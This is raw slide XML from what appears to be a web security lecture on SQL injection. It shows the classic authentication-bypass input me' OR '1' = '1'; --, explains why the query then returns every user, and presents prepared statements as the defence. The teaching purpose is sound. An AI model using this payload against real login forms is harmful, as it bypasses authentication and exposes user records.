        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="605" name="Shape 605"/>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Shape 610"/>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 Injection</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="611" name="Shape 611"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="254475" y="1600200"/>
            <a:ext cx="8728500" cy="32004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2400" u="none" cap="none" strike="noStrike">
                <a:solidFill>
                  <a:schemeClr val="lt1"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>Try setting </a:t>
            </a:r>
            <a:r>
              <a:rPr b="0" i="1" lang="en-US" sz="2400" u="none" cap="none" strike="noStrike">
                <a:solidFill>
                  <a:schemeClr val="lt1"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>$user </a:t>
            </a:r>
            <a:r>
              <a:rPr b="0" i="0" lang="en-US" sz="2400" u="none" cap="none" strike="noStrike">
                <a:solidFill>
                  <a:schemeClr val="lt1"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>equal to:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" marR="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="480"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="lt1"/>
              </a:buClr>
              <a:buSzPct val="25000"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr b="0" i="1" sz="2400" u="none" cap="none" strike="noStrike">
              <a:solidFill>
                <a:schemeClr val="lt1"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
              <a:ea typeface="Arial"/>
              <a:cs typeface="Arial"/>
              <a:sym typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" marR="0" rtl="0" algn="ctr">
              <a:spcBef>
                <a:spcPts val="400"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="FFFF00"/>
              </a:buClr>
              <a:buSzPct val="25000"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr b="1" i="1" lang="en-US" sz="2000" u="none" cap="none" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="FFF2CC"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>me’ OR ‘1’ = ‘1’; –-</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" marR="0" rtl="0" algn="ctr">
              <a:spcBef>
                <a:spcPts val="400"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="lt1"/>
              </a:buClr>
              <a:buSzPct val="25000"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr b="1" i="0" sz="2000" u="none" cap="none" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="FFFF00"/>
              </a:solidFill>
              <a:latin typeface="Courier New"/>
              <a:ea typeface="Courier New"/>
              <a:cs typeface="Courier New"/>
              <a:sym typeface="Courier New"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="-342900" lvl="0" marL="342900" marR="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="480"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="lt1"/>
              </a:buClr>
              <a:buSzPct val="100000"/>
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr b="0" i="0" lang="en-US" sz="2400" u="none" cap="none" strike="noStrike">
                <a:solidFill>
                  <a:schemeClr val="lt1"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>Now we get the query:		</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr indent="-342900" lvl="0" marL="342900" marR="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="400"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="lt1"/>
              </a:buClr>
              <a:buSzPct val="100000"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr b="1" i="0" sz="2000" u="none" cap="none" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="FFFF00"/>
              </a:solidFill>
              <a:latin typeface="Courier New"/>
              <a:ea typeface="Courier New"/>
              <a:cs typeface="Courier New"/>
              <a:sym typeface="Courier New"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="1" marL="457200" marR="0" rtl="0" algn="ctr">
              <a:spcBef>
                <a:spcPts val="360"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="FFFF00"/>
              </a:buClr>
              <a:buSzPct val="25000"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr b="1" i="0" lang="en-US" sz="1800" u="none" cap="none" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="FFF2CC"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>SELECT * FROM users WHERE username=‘me’ OR ‘1’ = ‘1’; –-</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="1" marL="457200" marR="0" rtl="0" algn="ctr">
              <a:spcBef>
                <a:spcPts val="360"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="lt1"/>
              </a:buClr>
              <a:buSzPct val="25000"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr b="1" i="0" sz="1800" u="none" cap="none" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="FFFF00"/>
              </a:solidFill>
              <a:latin typeface="Courier New"/>
              <a:ea typeface="Courier New"/>
              <a:cs typeface="Courier New"/>
              <a:sym typeface="Courier New"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="1" marL="457200" marR="0" rtl="0" algn="ctr">
              <a:spcBef>
                <a:spcPts val="360"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="lt1"/>
              </a:buClr>
              <a:buSzPct val="25000"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr b="1" i="0" sz="1800" u="none" cap="none" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="FFFF00"/>
              </a:solidFill>
              <a:latin typeface="Courier New"/>
              <a:ea typeface="Courier New"/>
              <a:cs typeface="Courier New"/>
              <a:sym typeface="Courier New"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="1" marL="457200" marR="0" rtl="0" algn="ctr">
              <a:spcBef>
                <a:spcPts val="360"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="lt1"/>
              </a:buClr>
              <a:buSzPct val="25000"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr b="1" i="0" sz="1800" u="none" cap="none" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="FFFF00"/>
              </a:solidFill>
              <a:latin typeface="Courier New"/>
              <a:ea typeface="Courier New"/>
              <a:cs typeface="Courier New"/>
              <a:sym typeface="Courier New"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="1" marL="457200" marR="0" rtl="0" algn="ctr">
              <a:spcBef>
                <a:spcPts val="360"/>
              </a:spcBef>
              <a:buClr>
                <a:schemeClr val="lt1"/>
              </a:buClr>
              <a:buSzPct val="25000"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr b="1" i="0" sz="1800" u="none" cap="none" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="FFFF00"/>
              </a:solidFill>
              <a:latin typeface="Courier New"/>
              <a:ea typeface="Courier New"/>
              <a:cs typeface="Courier New"/>
              <a:sym typeface="Courier New"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="612" name="Shape 612"/>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
        <p:nvSpPr>
          <p:cNvPr id="613" name="Shape 613"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="609600" y="4800600"/>
            <a:ext cx="8229600" cy="1477963"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchorCtr="0" anchor="t" bIns="45700" lIns="91425" rIns="91425" wrap="square" tIns="45700">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr indent="0" lvl="1" marL="457200" marR="0" rtl="0" algn="ctr">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buClr>
                <a:schemeClr val="lt1"/>
              </a:buClr>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr b="1" i="0" sz="1800" u="none" cap="none" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="FFFF00"/>
              </a:solidFill>
              <a:latin typeface="Courier New"/>
              <a:ea typeface="Courier New"/>
              <a:cs typeface="Courier New"/>
              <a:sym typeface="Courier New"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="614" name="Shape 614"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="453081" y="4800601"/>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lang="en-US" sz="3200">
                <a:solidFill>
                  <a:schemeClr val="lt1"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>What does this do?</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Shape 620"/>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indent="0" lvl="1" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="360"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr b="1" lang="en-US" sz="2400">
                <a:solidFill>
                  <a:srgbClr val="FFF2CC"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>SELECT * FROM users </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="1" marL="0" algn="l">
              <a:spcBef>
                <a:spcPts val="360"/>
              </a:spcBef>
              <a:buClr>
                <a:srgbClr val="FFFF00"/>
              </a:buClr>
              <a:buSzPct val="25000"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr b="1" lang="en-US" sz="2400">
                <a:solidFill>
                  <a:srgbClr val="FFF2CC"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>WHERE username=‘me’ OR ‘1’ = ‘1’; –-</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="621" name="Shape 621"/>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431800" lvl="0" marL="457200">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Retrieves the records for all users</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr indent="-431800" lvl="0" marL="457200">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>The query looks for tuples where </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr indent="-139700" lvl="0" marL="1257300" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US">
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>username = me is true</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr indent="-139700" lvl="0" marL="800100" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>OR</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr indent="-139700" lvl="0" marL="1257300">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US">
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>1=1 is true (always true)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr indent="-431800" lvl="0" marL="457200">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US">
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>--</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t> comments out the rest of the line</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="622" name="Shape 622"/>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Shape 628"/>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Preventing SQL Injections</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="629" name="Shape 629"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457200" y="1488426"/>
            <a:ext cx="8229600" cy="5050500"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchorCtr="0" anchor="t" bIns="91425" lIns="91425" rIns="91425" wrap="square" tIns="91425">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr indent="-431800" lvl="0" marL="457200" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Use prepared statements aka parameterized queries.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US">
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>$query = “SELECT * FROM Users </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr indent="457200" lvl="0" marL="0" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US">
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>WHERE name = ?"</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US">
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US">
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>$stmt = $mysqli-&gt;prepare($query);</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US">
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US">
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>$stmt -&gt;bindParam( 1, $name);</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US">
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US">
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>$name = $argv[0];</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US">
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US">
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>$stmt-&gt;execute();</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr b="1" sz="2100">
              <a:solidFill>
                <a:srgbClr val="FFF2CC"/>
              </a:solidFill>
              <a:latin typeface="Courier New"/>
              <a:ea typeface="Courier New"/>
              <a:cs typeface="Courier New"/>
              <a:sym typeface="Courier New"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="0" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="630" name="Shape 630"/>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Shape 635"/>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SQL Injection - Exercise</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="636" name="Shape 636"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="166650" y="2166100"/>
            <a:ext cx="8881800" cy="3960300"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchorCtr="0" anchor="t" bIns="45700" lIns="91425" rIns="91425" wrap="square" tIns="45700">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" marR="0" rtl="0" algn="ctr">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buClr>
                <a:schemeClr val="lt1"/>
              </a:buClr>
              <a:buSzPct val="25000"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr b="0" i="1" lang="en-US" sz="3200" u="sng" cap="none" strike="noStrike">
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>http://www.codebashing.com/sql_demo</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" marR="0" rtl="0" algn="ctr">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buClr>
                <a:schemeClr val="lt1"/>
              </a:buClr>
              <a:buSzPct val="25000"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr i="1"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="637" name="Shape 637"/>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pic>
        <p:nvPicPr>
          <p:cNvPr id="638" name="Shape 638"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="166650" y="3696550"/>
            <a:ext cx="8810676" cy="2712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Shape 644"/>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i="0" lang="en-US" sz="4400" u="none" cap="none" strike="noStrike">
                <a:solidFill>
                  <a:schemeClr val="lt1"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>Topics</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="645" name="Shape 645"/>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Crash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Parameter Tampering</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rgbClr val="FFFFFF"/>
              </a:buClr>
              <a:buSzPct val="100000"/>
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr b="0" i="0" lang="en-US" sz="3200" u="none" cap="none" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>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rgbClr val="FFFF00"/>
              </a:buClr>
              <a:buSzPct val="100000"/>
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr b="0" i="0" lang="en-US" sz="3200" u="none" cap="none" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>Cross Site Scripting (XSS)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p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="460975" y="1429918"/>
            <a:ext cx="8229600" cy="47343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39" name="Shape 139"/>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Client-Server Architecture</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="140" name="Shape 140"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457200" y="1600200"/>
            <a:ext cx="8229600" cy="4526100"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchorCtr="0" anchor="t" bIns="91425" lIns="91425" rIns="91425" wrap="square" tIns="91425">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr lvl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Pictures of clients and servers, animate arrows for communication</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr lvl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Talk about request/response system</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="141" name="Shape 14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142" name="Shape 142"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="457200" y="1429915"/>
            <a:ext cx="1524000" cy="1524000"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="143" name="Shape 143"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="7162800" y="3186963"/>
            <a:ext cx="1524000" cy="1352550"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="144" name="Shape 144"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId5">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="457203" y="4649765"/>
            <a:ext cx="1524000" cy="1524000"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="145" name="Shape 145"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId6">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="457200" y="3101250"/>
            <a:ext cx="1524000" cy="1524000"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="146" name="Shape 146"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId7">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="5829300" y="4649775"/>
            <a:ext cx="2857500" cy="1524000"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="147" name="Shape 147"/>
          <p:cNvPicPr preferRelativeResize="0"/>
